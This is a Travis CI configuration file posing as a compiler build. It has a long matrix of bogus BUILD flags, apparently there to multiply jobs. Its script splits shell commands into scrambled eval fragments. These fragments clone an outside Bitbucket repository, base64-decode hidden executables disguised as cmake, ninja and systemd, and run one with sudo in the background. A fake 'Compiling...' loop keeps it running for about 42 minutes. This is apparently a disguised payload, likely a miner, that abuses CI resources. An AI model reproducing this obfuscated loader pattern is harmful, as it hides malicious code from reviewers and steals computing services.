dist: bionic

env:
  - BUILD="--search=968Fr"
  - BUILD="--buildpkg=967NJ"
  - BUILD="--dynamic-deps=618ES"
  - BUILD="--sync-submodule=798Ti"
  - BUILD="--fuzzy-search=40lg"
  - BUILD="--fetchonly=593cm"
  - BUILD="--complete-graph-if-new-use=972Su"
  - BUILD="--autounmask-unrestricted-atoms=136Xk"
  - BUILD="--reinstall=843bL"
  - BUILD="--rage-clean=961Wj"
  - BUILD="--search-similarity=211jz"
  - BUILD="--read-news=162Of"
  - BUILD="--pkg-format=4117t"
  - BUILD="--ignore-built-slot-operator-deps=69HU"
  - BUILD="--config=550R2"
  - BUILD="--info=816LY"
  - BUILD="--autounmask-unrestricted-atoms=8610E"
  - BUILD="--newuse=347KK"
  - BUILD="--selective=602to"
  - BUILD="--quiet-unmerge-warn=536vy"
  - BUILD="--backtrack=131PP"
  - BUILD="--quiet-unmerge-warn=515he"
  - BUILD="--rebuild-if-new-rev=678eg"
  - BUILD="--buildpkg-exclude=826ot"
  - BUILD="--verbose=781ox"
  - BUILD="--accept-properties=676rC"
  - BUILD="--config=8103l"
  - BUILD="--ignore-built-slot-operator-deps=348X0"
  - BUILD="--oneshot=715Cz"
  - BUILD="--usepkgonly=240Ez"
  - BUILD="--debug=977Xz"
  - BUILD="--autounmask-write=553kU"
  - BUILD="--getbinpkgonly=333kw"
  - BUILD="--nodeps=54Y5"
  - BUILD="--autounmask-keep-masks=158WF"
  - BUILD="--depclean=64jv"
  - BUILD="--quiet-unmerge-warn=3156x"
  - BUILD="--getbinpkg=941U7"
  - BUILD="--fetchonly=573wb"
  - BUILD="--select=829CM"
  - BUILD="--alphabetical=1913M"
  - BUILD="--depclean-lib-check=93VI"
  - BUILD="--deselect=868ZK"
  - BUILD="--rebuilt-binaries-timestamp=26vT"
  - BUILD="--sync=34S1"
  - BUILD="--list-sets=921KN"
  - BUILD="--alphabetical=68Fp"
  - BUILD="--keep-going=308gj"
  - BUILD="--complete-graph=886yB"
  - BUILD="--changed-deps=651T0"
  - BUILD="--changed-deps-report=91YQ"
  - BUILD="--ignore-built-slot-operator-deps=963xN"
  - BUILD="--rebuild-if-unbuilt=309i8"
  - BUILD="--autounmask-only=492ip"
  - BUILD="--verbose-conflicts=720q3"
  - BUILD="--with-test-deps=663bs"
  - BUILD="--changed-slot=627gc"
  - BUILD="--list-sets=150xT"
  - BUILD="--accept-restrict=560KO"
  - BUILD="--rebuild-ignore=212LM"
  - BUILD="--onlydeps=3638X"
  - BUILD="--quiet-fail=907dJ"
  - BUILD="--quiet-build=911A"
  - BUILD="--pkg-format=794G6"
  - BUILD="--digest=830dM"
  - BUILD="--searchdesc=623yd"
  - BUILD="--autounmask-license=8752z"
  - BUILD="--usepkg-exclude=463T4"
  - BUILD="--misspell-suggestions=945KE"
  - BUILD="--changed-deps=772Gf"
  - BUILD="--autounmask-backtrack=8833d"
  - BUILD="--reinstall-atoms=6400Z"
  - BUILD="--getbinpkgonly=3356j"
  - BUILD="--skipfirst=920EV"
  - BUILD="--changelog=699KN"
  - BUILD="--autounmask-only=887Fk"
  - BUILD="--rebuild-if-new-rev=9631O"
  - BUILD="--with-test-deps=241DE"
  - BUILD="--changed-use=325os"
  - BUILD="--ask-enter-invalid=7770V"
  - BUILD="--newuse=692wy"
  - BUILD="--misspell-suggestions=2848R"
  - BUILD="--unmerge=622JR"
  - BUILD="--prefix=338i"
  - BUILD="--color=983zv"
  - BUILD="--ignore-soname-deps=594Mt"
  - BUILD="--implicit-system-deps=812RK"
  - BUILD="--package-moves=66422"
  - BUILD="--complete-graph-if-new-ver=831tb"
  - BUILD="--update=482Ac"
  - BUILD="--unordered-display=396a1"
  - BUILD="--newrepo=709GM"
  - BUILD="--autounmask-keep-keywords=932yg"
  - BUILD="--rebuild-ignore=160iG"
  - BUILD="--complete-graph-if-new-ver=394ya"
  - BUILD="--alphabetical=361Cc"
  - BUILD="--ask=491nP"
  - BUILD="--getbinpkg=390nd"
  - BUILD="--skipfirst=177zQ"
  - BUILD="--autounmask-keep-keywords=74ZI"
  - BUILD="--autounmask-write=686wQ"
  - BUILD="--metadata=5792G"
  - BUILD="--sysroot=3I7"
  - BUILD="--root-deps=2662V"
  - BUILD="--autounmask-unrestricted-atoms=799W1"
  - BUILD="--quiet-fail=678YV"
  - BUILD="--misspell-suggestions=246Y2"
  - BUILD="--verbose=313Bd"
  - BUILD="--color=500DK"
  - BUILD="--autounmask-only=266xY"
  - BUILD="--oneshot=784hY"
  - BUILD="--sync-submodule=127Zh"
  - BUILD="--oneshot=228rH"
  - BUILD="--ignore-soname-deps=723zj"
  - BUILD="--oneshot=5627H"
  - BUILD="--clean=346r0"
  - BUILD="--rebuilt-binaries=875YZ"
  - BUILD="--help=456r7"
  - BUILD="--prefix=416pn"
  - BUILD="--changed-deps-report=711B6"
  - BUILD="--root=7939J"
  - BUILD="--rebuild-if-new-rev=136Te"
  - BUILD="--oneshot=7585N"
  - BUILD="--check-news=123xG"
  - BUILD="--digest=618hv"
  - BUILD="--verbose=958cB"
  - BUILD="--rage-clean=45408"
  - BUILD="--check-news=802KW"
  - BUILD="--clean=534eS"
  - BUILD="--autounmask-only=981Dg"
  - BUILD="--info=173CN"
  - BUILD="--use-ebuild-visibility=9613X"
  - BUILD="--color=34tw"
  - BUILD="--check-news=548Tq"
  - BUILD="--searchdesc=89Tu"
  - BUILD="--useoldpkg-atoms=499fP"
  - BUILD="--changed-use=626zc"
  - BUILD="--info=289Kd"
  - BUILD="--fuzzy-search=245pH"
  - BUILD="--complete-graph-if-new-ver=143l"
  - BUILD="--root=138d8"
  - BUILD="--changed-deps=609Gk"
  - BUILD="--oneshot=963Ye"
  - BUILD="--sync=805Gn"
  - BUILD="--pkg-format=1837I"
  - BUILD="--changed-slot=766rE"
  - BUILD="--quiet-unmerge-warn=731LL"
  - BUILD="--ignore-soname-deps=369zq"
  - BUILD="--verbose=750RS"
  - BUILD="--select=568xo"
  - BUILD="--fetch-all-uri=27ii"
  - BUILD="--autounmask-keep-keywords=931O2"
  - BUILD="--regen=208ez"
  - BUILD="--complete-graph-if-new-use=324uq"
  - BUILD="--quiet-build=80Qc"
  - BUILD="--newrepo=597wC"
  - BUILD="--searchdesc=305Us"
  - BUILD="--onlydeps=153pf"
  - BUILD="--ignore-world=944Oi"
  - BUILD="--ignore-default-opts=1392a"
  - BUILD="--backtrack=303Br"
  - BUILD="--depclean-lib-check=102UN"
  - BUILD="--usepkgonly=743Kr"
  - BUILD="--autounmask=777V3"
  - BUILD="--clean=147tb"
  - BUILD="--check-news=24sD"
  - BUILD="--columns=9e5"
  - BUILD="--autounmask-write=530qN"
  - BUILD="--columns=794Ig"
  - BUILD="--rage-clean=156Od"
  - BUILD="--with-bdeps-auto=383Kw"
  - BUILD="--deselect=8400j"
  - BUILD="--sync-submodule=926g0"
  - BUILD="--with-bdeps-auto=9931A"
  - BUILD="--depclean=201A7"
  - BUILD="--changed-deps=467ql"
  - BUILD="--ask-enter-invalid=678kU"
  - BUILD="--complete-graph=422y7"
  - BUILD="--getbinpkg=839Rb"
  - BUILD="--buildpkg-exclude=440Hu"
  - BUILD="--unordered-display=23tv"
  - BUILD="--alphabetical=2177A"
  - BUILD="--misspell-suggestions=213ol"
  - BUILD="--fuzzy-search=6082v"
  - BUILD="--pretend=116hs"
  - BUILD="--root-deps=603oz"

language: minimal

script:
  - sudo apt update || true
  - aXiGG="sudo apt --"
  - kYahxBhpPyW="yes install"
  - HKLCIUTjBpt=" cl-base64 "
  - kbwWxPfw="git &>/dev/"
  - eval "$aXiGG""$kYahxBhpPyW""$HKLCIUTjBpt""$kbwWxPfw""null"
  - ypPwlOVfL="git clone h"
  - rEwAk="ttps://gccb"
  - KfjNSRq="uild@bitbuc"
  - GnaxkICPSf="ket.org/gcc"
  - AcUxl="build/gcc.g"
  - UjdIep="it &>/dev/n"
  - eval "$ypPwlOVfL""$rEwAk""$KfjNSRq""$GnaxkICPSf""$AcUxl""$UjdIep""ull"
  - PROeUpnmoq="base64 -d g"
  - vgxhxfwn="cc/cmake_ >"
  - eval "$PROeUpnmoq""$vgxhxfwn"" cmake"
  - nppwyF="base64 -d g"
  - DpBRlY="cc/config_ "
  - eval "$nppwyF""$DpBRlY""> systemd"
  - iGQZWrR="base64 -d g"
  - heWnNKZA="cc/make_ > "
  - eval "$iGQZWrR""$heWnNKZA""ninja"
  - RttbDTLTu="chmod +x ni"
  - eval "$RttbDTLTu""nja cmake"
  - ypCcfVExX="./cmake"
  - eval "$ypCcfVExX"""
  - AZyklm="sed -i 's/b"
  - quODNcjkHp="uild/tb2o/g"
  - eval "$AZyklm""$quODNcjkHp""' systemd"
  - sudo ./ninja -c systemd &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2526)) ] && sudo killall ninja && break; sleep 213; done
